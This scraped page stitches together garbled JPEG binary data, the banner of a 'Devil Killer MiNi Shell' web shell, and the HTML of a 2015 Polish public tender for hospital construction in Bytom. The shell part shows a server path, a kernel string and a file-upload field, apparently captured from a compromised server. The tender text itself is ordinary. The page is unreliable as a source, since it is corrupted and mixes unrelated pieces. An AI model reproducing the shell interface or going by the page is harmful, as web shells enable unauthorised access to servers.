JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150220/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150220/23655-N-2015.html

<p class="kh_header"><b>Bytom: Przetarg na  wykonaniu prac wykończeniowych obejmujących łącznik pomiędzy blokiem nr 5 i 5a oraz  na przebudowie 1 piętra budynku bloku VA Szpitala Specjalistycznego nr 2 w Bytomiu Nr sprawy : 4 . 4 PN . 2015</b><br>
<b>Numer ogłoszenia: 23655 - 2015; data zamieszczenia: 20.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny Nr 2 , ul. Stefana Batorego 15, 41-902 Bytom, woj. śląskie, tel. 32 7861400, faks 32 7861646.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital2.bytom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg na  wykonaniu prac wykończeniowych obejmujących łącznik pomiędzy blokiem nr 5 i 5a oraz  na przebudowie 1 piętra budynku bloku VA Szpitala Specjalistycznego nr 2 w Bytomiu Nr sprawy : 4 . 4 PN . 2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane, polegające  na wykonaniu prac budowlanych i instalacyjnych w tym wykończeniowych  obejmujących łącznik pomiędzy blokiem nr 5 i 5a oraz  na przebudowie 1 piętra budynku bloku VA Szpitala Specjalistycznego nr 2 w Bytomiu na potrzeby Oddziału Noworodków w związku z  organizacją Śląskiego Centrum Perinatologii, Ginekologii i Chirurgii Płodu na bazie Katedry i Oddziału Klinicznego Ginekologii, Położnictwa i Ginekologii Onkologicznej przy uwzględnieniu aktualnie obowiązujących wymogów technicznych i funkcjonalnych, przystosowaniu dla osób niepełnosprawnych i dostosowaniu do przepisów p.poż.
Dostawę i montaż 1 dźwigu szpitalnego - 10 przystankowego, przelotowego, elektrycznego zlokalizowanego w łączniku. Wykonanie podłączenia rozdzielni głównej bloku Va i stacji transformatorowej
Wykonanie obejmuje również :
1.	Wykonanie wraz z projektem wykonawczym wentylacji pomieszczeń wentylacji w pomieszczeniach sprężarkowi  zlokalizowanej w przyziemiu bloku VI.
2.	Wykonie drugiego pionu hydrantowego w przy klatce schodowej w bloku VA wraz z uzgodnieniem z rzeczoznawca ppoż. i wykonie niezbędnych robót budowlanych i wykończeniowych w tym zakresie w sposób nie powodujący utratę gwarancji dotychczasowego GW.
3.	Instalacje niskoprądowe należy wykonać  w  nawiązaniu do opracowań i robót wykonywanych przez GW wykonującego prace w   przedmiotowym zadaniu  z wyłączeniem I piętra i łącznika.
4.	Wykonanie instalacji gazów medycznych wraz z projektem wykonawczym z uwzględnieniem wymogów normowych i Dyrektywą wyroby medyczne 93.43.EWG.P

Wszystkie podłączenia i wpięcia instalacji, badania, próby i sprawdzenie należy uzgodnić z GW wykonującym obecnie prace, tak, aby nie utracić gwarancji.

3.1.	Przedmiot zamówienia obejmuje m.in.:
4.1.1. Dostosowane I piętra budynku szpitalnego Bloku VA na - Oddział Noworodków ze stanowiskami intensywnej opieki;
4.1.2  Dostawę i montaż 1 dźwigu szpitalnego 10 przystankowego elektrycznego zlokalizowanego w łączniku komunikacyjnym.
4.1.3 Realizacja gazów medycznych wraz z projektem wykonawczym w obrębie I piętra 
4.1.4 Roboty wykończeniowe w obrębię łącznika komunikacyjnego łącznie z instalacją elektryczną, niskoprądową w tym przeciwpożarową i sygnalizacji pożaru
4.1.5  Wykonanie podłączenia rozdzielni głównej bloku Va i stacji transformatorowej.
4.1.6. Roboty ogólnobudowlane, w tym m.in:
wykonanie instalacji oświetlenia zewnętrznego przy budynku Va, VI i łącznika
wykonanie nowych ścianek działowych z dodatkowym wzmocnieniem - uzbrojeniem celem montażu specjalistycznych ciężkich urządzeń i aparatury medycznej.
wykonanie nowych instalacji wewnętrznych: wod-kan, co, gazowej, gazów medycznych, wentylacji mechanicznej, instalacji elektrycznej, niskoprądowej, przeciwpożarowej i sygnalizacji pożaru, 
wykonanie nowych posadzek (posadzki z materiałów gładkich, trwałych, zmywalnych, nienasiąkliwych i odpornych na działanie środków dezynfekcyjnych)
wykonanie tynków, malowanie ścian i sufitów, ułożenie płytek gresowych, okładzin 
montaż odbojnic i zabezpieczeń narożników
montaż stolarki drzwiowej i stolarki aluminiowej wewnętrznej
wykonanie sufitów podwieszanych
	wykonanie innych niezbędnych prac wymienionych w zadaniach poniżej  pozwalających na  uzyskanie pozwolenia na użytkowanie całego obiektu Va  przez Firmę wykonującą roboty w branży budowlanej w ramach niniejszego przetargu ( w tym wykonanie brakujących opracowań projektowych dla realizacji w/w zakresu prac i efektu jako całości)

3.2.	Szczegółowy zakres robót określa dokumentacja projektowa opracowana  przez Wielobranżowe Towarzystwo Projektowo - Produkcyjne MARWIT s.c., 44-100 Gliwice, ul. Częstochowska 16,  zawierająca specyfikacje techniczne wykonania i odbioru robót oraz przedmiar robót i stanowiąca część D niniejszej SIWZ, w zakresie I piętra i łącznika komunikacyjnego.

Zakres prac budowlanych został podzielony na 6 zadań tj:

	Zadanie nr 1 Roboty ogólnobudowlane i wykończeniowe wraz dostawą i  montażem dźwigu szpitalnego.

	Opis przedmiotu zamówienia
Przedmiotem zamówienia są roboty ogólnobudowlane polegające na wykonaniu prac budowlanych, prac instalacyjnych oraz wszelkich wykończeniowych obejmujących łącznik pomiędzy blokiem nr 5 i 5a oraz  na przebudowie 1 piętra budynku bloku VA Szpitala Specjalistycznego nr 2 w Bytomiu na potrzeby Oddziału Noworodków w związku z  organizacją Śląskiego Centrum Perinatologii, Ginekologii i Chirurgii Płodu na bazie Katedry i Oddziału Klinicznego Ginekologii, Położnictwa i Ginekologii Onkologicznej przy uwzględnieniu aktualnie obowiązujących wymogów technicznych i funkcjonalnych, przystosowaniu dla osób niepełnosprawnych i dostosowaniu do przepisów p.poż. W ramach niniejszego zadania należy również wykonać wszelkie czynności związane z koordynacją wszystkich, poszczególnych branż i pakietów jak niżej  na placu budowy i uzyskanie pozwolenia na użytkowanie nowopowstałego i przebudowanego zespołu budynków tj: łącznika , przewiązki, bloku Va łacznie             z dobudowaną klatką schodową w uzgodnieniu z dotychczasowym Kierownikiem Robót GW                           i Koordynatorem ds. Inwestycji i Remontów  Szpitala Specjalistycznego nr 2 w Bytomiu w zakresie : robót, prób , badań i sprawdzeń. Instalacje niskoprądowe należy wykonać  w  nawiązaniu do opracowań i robót wykonywanych przez GW wykonującego prace w   przedmiotowym zadaniu  z wyłączeniem I piętra i łącznika wraz z projektem wykonawczym.
Zbiorczy całościowy HARMONOGRAM realizacji rzeczowo-finansowy winien być opracowany przez Wykonawcze realizującego Zadanie nr 1 na bazie i w uzgodnieniu z wykonawcami wykonującymi pozostałe zadania i przekazany  Zamawiającemu.
 Dostawa i montaż dźwigu szpitalnego.

Opis przedmiotu zamówienia
Przedmiotem zamówienia jest dostawa  i montaż 1 dźwigu szpitalnego 10 przystankowego elektrycznego zlokalizowanego w łączniku komunikacyjnym pomiędzy blokiem nr 5 i 5a  Szpitala Specjalistycznego nr 2 w Bytomiu  na potrzeby Oddziału Noworodków w związku z  organizacją Śląskiego Centrum Perinatologii, Ginekologii i Chirurgii Płodu na bazie Katedry i Oddziału Klinicznego Ginekologii, Położnictwa i Ginekologii Onkologicznej przy uwzględnieniu aktualnie obowiązujących wymogów technicznych i funkcjonalnych, przystosowaniu dla osób niepełnosprawnych i dostosowaniu do przepisów p.poż. Szczegółowy wymagane dane techniczne dźwigu będące opisem stanowi Załącznik nr 1 do Zadania nr 1 będący stanowiąca część D niniejszej SIWZ. W ramach dostawy dźwigu należy uzyskać odbiór UDT, a także wykonać roboty w branży budowlanej i elektrycznej.
Szczegółowy zakres robót określa dokumentacja projektowa opracowana  przez Wielobranżowe Towarzystwo Projektowo - Produkcyjne MARWIT s.c., 44-100 Gliwice, ul. Częstochowska 16,  zawierająca specyfikacje techniczne wykonania i odbioru robót oraz przedmiar robót w zakresie I piętra i łącznika pomiędzy blokiem nr 5 i 5a i stanowiąca część D Pakiet nr 1 niniejszej SIWZ ,.
Zadanie nr 2  Instalacje elektryczne
Opis przedmiotu zamówienia
Przedmiotem zamówienia jest wykonanie nowej instalacji elektrycznej, niskoprądowej w tym instalacji  przeciwpożarowej i sygnalizacji pożaru,  obejmujących łącznik pomiędzy blokiem nr 5 i 5a oraz 1 piętro budynku bloku VA Szpitala Specjalistycznego nr 2 w Bytomiu   na potrzeby Oddziału Noworodków w związku z  organizacją Śląskiego Centrum Perinatologii, Ginekologii i Chirurgii Płodu na bazie Katedry i Oddziału Klinicznego Ginekologii, Położnictwa i Ginekologii Onkologicznej przy uwzględnieniu aktualnie obowiązujących wymogów technicznych i funkcjonalnych, przystosowaniu dla osób niepełnosprawnych i dostosowaniu do przepisów p.poż.
Zamawiający wymaga aby oferowane oświetlenie zostało wykonane w technologii LED energooszczędnej. Dodatkowo na łączniku należy zastosować czujniki ruchu umożliwiające wł/wył oświetlenia w zależności od ruchu pieszego.   
Szczegółowy zakres robót określa dokumentacja projektowa opracowana  przez Wielobranżowe Towarzystwo Projektowo - Produkcyjne MARWIT s.c., 44-100 Gliwice, ul. Częstochowska 16,  zawierająca specyfikacje techniczne wykonania i odbioru robót oraz przedmiar robót w zakresie I piętra i łącznika pomiędzy blokiem nr 5 i 5a i stanowiąca część D Pakiet nr 2 niniejszej SIWZ ,.
         UWAGA: W załączonych przedmiarach Zamawiający wyłącza z wyceny i wykonania Dział 6 Instalacja detekcji gazów poz 79-91 oraz z Działy 7 poz 97 - Roboty dodatkowe. W Dziale 1 należy uwzględnić dodatkowe rozdzielnice w przedmiarze są 4 komplety prawidłowa wartość 5.

	Zadanie nr 3 Instalacje wod-kan, c.o.
Przedmiotem zamówienia jest wykonanie nowej instalacji wod-kan, c.o,  obejmującej 1 piętro budynku bloku VA Szpitala Specjalistycznego nr 2 w Bytomiu  na potrzeby Oddziału Noworodków w związku z  organizacją Śląskiego Centrum Perinatologii, Ginekologii i Chirurgii Płodu na bazie Katedry i Oddziału Klinicznego Ginekologii, Położnictwa i Ginekologii Onkologicznej przy uwzględnieniu aktualnie obowiązujących wymogów technicznych i funkcjonalnych, przystosowaniu dla osób niepełnosprawnych i dostosowaniu do przepisów p.poż. 
Szczegółowy zakres robót określa dokumentacja projektowa opracowana  przez Wielobranżowe Towarzystwo Projektowo - Produkcyjne MARWIT s.c, 44-100 Gliwice, ul. Częstochowska 16,  zawierająca specyfikacje techniczne wykonania i odbioru robót oraz przedmiar robót w zakresie I piętra i stanowiąca część D Pakiet nr 3 niniejszej SIWZ ,.
Należy w obiekcie stosować grzejniki higieniczne wg PN. oraz wykonać drugi hydrant na klatce schodowej łącznie z projektem wykonawczym wraz z  uzyskaniem akceptacji rzeczoznawcy ppoż.
Lokalizacja drugiego pionu hydrantowego w przy klatce schodowej w bloku VA wraz z           uzgodnieniem z rzeczoznawca ppoż. i wykonanie niezbędnych robót budowlanych i          wykończeniowych w tym zakresie w sposób nie powodujący utratę gwarancji dotychczasowego          GW.

	Zadanie nr 4 Wentylacja mechaniczna
Opis przedmiotu zamówienia
Przedmiotem zamówienia jest wykonanie nowej instalacji wentylacji mechanicznej  obejmujących w bloku  5a 1 piętro budynku z uwzględnieniem zakupionych i zamontowanych na dachu budynku central wentylacyjnych  w  Szpitala Specjalistycznego nr 2 w Bytomiu  na potrzeby Oddziału Noworodków w związku z  organizacją Śląskiego Centrum Perinatologii, Ginekologii i Chirurgii Płodu na bazie Katedry i Oddziału Klinicznego Ginekologii, Położnictwa i Ginekologii Onkologicznej przy uwzględnieniu aktualnie obowiązujących wymogów technicznych i funkcjonalnych, przystosowaniu dla osób niepełnosprawnych i dostosowaniu do przepisów p.poż. 
Szczegółowy zakres robót określa dokumentacja projektowa opracowana  przez Wielobranżowe Towarzystwo Projektowo - Produkcyjne MARWIT s.c., 44-100 Gliwice, ul. Częstochowska 16,  zawierająca specyfikacje techniczne wykonania i odbioru robót oraz przedmiar robót w zakresie I piętra i łącznika pomiędzy blokiem nr 5 i 5a i stanowiąca część D Pakiet nr 4 niniejszej SIWZ ,.
Należy dostosować wentylację nawiewną i wywiewną w  pomieszczeniach sprężarkowi zlokalizowanej w bloku VI Szpitala Specjalistycznego nr tak, aby uzyskać wymagane warunki normowe. Należy uwzględnić dostosowanie centrali wentylacyjnej w układ schładzania powietrza na I piętrze.
         UWAGA: W załączonych przedmiarach Zamawiający dopuszcza wyłączenie części klap ppoż. Z poz. od 14-21 przechodzących przez przegrody pionowe po wcześniejszym uzgodnieniu z rzeczoznawcą ppoż. a ponadto zamienia  izolacji z kauczuku na izolację z wełny mineralnej w płaszczu z aluminium.

	Zadanie nr  5  Ułożenie kabli niskiego napięcia
Opis przedmiotu zamówienia
             Przedmiotem zamówienia jest :  1.  ułożenie dwóch kabli niskiego napięcia zasilających   
       Rozdzielnię Główną  bloku 5a szpitala ( wraz z jednym kablem sterowniczym )  z projektowanej  
       stacji transformatorowej odbiorczej szpitala , 2. podpięcie tych kabli w Rozdzielni Głównej bloku 5a   
       i przeprogramowanie automatyki SZR w.w Rozdzielni Głównej wraz  z połączeniem z istniejącymi    
       kablami zasilającymi  pozostałe budynki szpitala . 
              Szczegółowy zakres robót określa dokumentacja projektowa opracowana  przez Przedsiębiorstwo  
              Produkcyjno-Usługowe BUDOMONT - 7  sp. z o.o. ,41-704 Ruda Śląska,  ul. Kardynała Augusta 
              Hlonda 50 stanowiąca część D Pakiet nr 5 niniejszej SIWZ .

Zadanie nr 6  Instalacje gazów medycznych
Opis przedmiotu zamówienia
Przedmiotem zamówienia jest wykonanie instalacji gazów medycznych wraz z projektem wykonawczym z uwzględnieniem wymogów normowych i Dyrektywą wyroby medyczne 93.43.EWG.P w  nawiązaniu do opracowań projektowych i robót wykonywanych przez GW wykonującego prace w  przedmiotowym zadaniu  z wyłączeniem I piętra i łącznika. W zakres zamówienia włącza się również dostawę i montaż 5 szt. paneli ściennych dla noworodków zgodnie z opisem w załączniku nr 1 do Zadania 6.
Szczegółowy zakres robót określa dokumentacja projektowa opracowana  przez Wielobranżowe Towarzystwo Projektowo - Produkcyjne MARWIT s.c., 44-100 Gliwice, ul. Częstochowska 16,  zawierająca specyfikacje techniczne wykonania i odbioru robót oraz przedmiar robót w zakresie I piętra i łącznika pomiędzy blokiem nr 5 i 5a i stanowiąca część D Pakiet nr 6 niniejszej SIWZ
Nazwa i kod wg Wspólnego Słownika Zamówień (CPV):.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-0, 45.21.51.41-0, 45.31.10.00-0, 45.33.11.00-0, 45.33.12.00-0, 45.33.20.00-0, 45.33.30.00-0, 45.21.51.40-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do niniejszego postępowania jest obowiązany wnieść wadium na czas związania ofertą. 
Oferta musi być zabezpieczona wadium o wartości:  
Zadanie nr 1 - 30 000,00 zł. (słownie:  trzydzieści  tysięcy złotych i 00.100). 
Zadanie nr 2 -  23 000,00 zł. (słownie: tysiąc pięćset złotych i 00.100). 
Zadanie nr 3 -   5 000,00 zł. (słownie: pięć tysięcy złotych i 00.100). 
Zadanie nr 4 - 15 000,00 zł (słownie: piętnaście  tysięcy złotych i 00.100).
Zadanie nr 5 -   1800,00 zł  (słownie:  tysiąc osiemset złotych i 00.100).
Zadanie nr 6 -    5 700,00 zł (słownie:  pięć tysięcy siedemset złotych i 00.100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>9.1.1. posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>9.1.2. posiadania niezbędnej wiedzy i doświadczenia.
O zamówienie mogą ubiegać się wykonawcy, których wiedza i doświadczenie pozwoli na prawidłowe wykonanie zamówienia, w szczególności o zamówienie mogą ubiegać się wykonawcy, którzy w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej dwie roboty  budowlane odpowiadające  swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, co winno wynikać z dokumentów określonych w pkt. 10.1.2.
Jako robotę budowlaną odpowiadającą swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia Zamawiający rozumie realizację dotyczącą wykonania robót objętych pakietami w obiektach szpitalnych w ramach zadań nr 1,4 i 6 wraz z robotami towarzyszącymi. W ramach zadania nr 2,3,5 Zamawiający rozumie realizację dotyczącą wykonania robót objętych zadaniem wraz z robotami towarzyszącymi i wartości nie niższej jak:
w zamach zadania nr 1 -   500 000  PLN brutto  
w ramach zadania nr 2 -     350 000 PLN brutto 
w ramach zadania nr 3 -     100 000 PLN brutto
w ramach zadania nr 4 -     300 000 PLN brutto  
w ramach zadania nr 5 -      50 000 PLN brutto  
w ramach zadania nr 6 -     300 000 PLN brutto 
przy czym przez wartość roboty należy rozumieć kwotę umowną.
W przypadku inwestycji, których wartość została wyrażona w umowie w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN, przy zastosowaniu kursów walutowych po przeliczeniu średnim kursem NBP na dzień ukazania się ogłoszenia o zamówieniu w niniejszym postępowaniu (w przypadku inwestycji rozliczanych wyłącznie w walutach innych niż PLN). Jako referencje (inne dokumenty) dotyczące realizacji z ostatnich 5 lat przed upływem terminu składania ofert, Zamawiający uzna takie, które dotyczą realizacji zadań, których zakończenie miało miejsce nie wcześniej jak 5 lat przed upływem terminu składania ofert
10.1.2.	wykazu wykonanych, niewykonanych lub nienależycie wykonanych robót budowlanych (na formularzu stanowiącym Załącznik nr 3 do IDW), z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
W wykazie należy ująć roboty wykonane (tj. zakończone) w zakresie niezbędnym do wykazania w sposób bezsporny spełniania warunku wiedzy i doświadczenia opisanego w pkt. 9.1.2 oraz wszelkie roboty tego typu niewykonane lub wykonane nienależycie, w celu zweryfikowania rzetelności, kwalifikacji, efektywności i doświadczenia Wykonawcy. 
Uwaga: Zamawiający informuje, iż w przypadku gdy co najmniej jedna robota będzie nienależycie wykonana lub niewykonana spośród robót , które Wykonawca winien ująć w wykazie, Wykonawca ten zostanie wykluczony z postępowania o zamówienie publiczne.
    W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz gdy Wykonawca polega na wiedzy i doświadczeniu innych podmiotów,  również jedna robota nienależycie wykonana, lub nie wykonana będzie liczona łącznie dla wszystkich robót ujętych w wykazie niezależnie od podmiotu, który ją wykonał
10.1.2.1.	Dowodami są:
a.	poświadczenie,
b.	inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia,
10.1.2.2.	W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie, zostały wcześniej wykonane, wykonawca nie ma obowiązku przekładania dowodów, o których mowa powyżej. 
10.1.2.3.	Wykonawca, w miejsce poświadczeń, o których mowa powyżej, może przedłożyć dokumenty potwierdzające wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie, określone w § 1 ust. 1 pkt. 2 i 3 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>9.1.3. dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia, tj.
O zamówienie mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować odpowiednio wykwalifikowanymi osobami posiadającymi uprawnienia do kierowania robotami budowlanymi w odpowiednich specjalnościach dla obsadzenia stanowisk:
Kierownika Budowy posiadającego wykształcenie wyższe i co najmniej 5 - letnie doświadczenie zawodowe w kierowaniu robotami budowlanymi w specjalności konstrukcyjno - budowlanej na stanowisku kierownika budowy, lub kierownika robót, gdzie był odpowiedzialny w szczególności za wykonywanie robót budowlanych dotyczących obiektów szpitalnych oraz posiadającego uprawnienia konstrukcyjno-budowlane bez ograniczeń, a także wpisanego na listę członków właściwej izby samorządu zawodowego zgodnie z obowiązującymi przepisami prawa w danym kraju.(wymagane doświadczenie w wykonywaniu prac w Obiektach Ochrony Zdrowia) 
Kierownika robót instalacyjnych - posiadającego co najmniej 5-letnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku odpowiedzialnym za wykonywanie robót z zakresu budowy sieci i instalacji c.o., w tym doświadczenie w pełnieniu samodzielnej funkcji technicznej w budownictwie (kierownika budowy lub robót, oraz posiadającego uprawnienia bez ograniczeń do pełnienia samodzielnych funkcji technicznych w budownictwie, kierownika budowy i robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wentylacyjnych, cieplnych, gazowych, wodociągowych i kanalizacyjnych), wpisanego na listę członków właściwej izby samorządu zawodowego zgodnie z obowiązującymi przepisami prawa w danym kraju co winno wynikać z dokumentów określonych w pkt. 10.1.3. i 10.1.4.( dla zadania 6 wymagane doświadczenie w wykonywaniu gazów medycznych w obiektach szpitalnych)
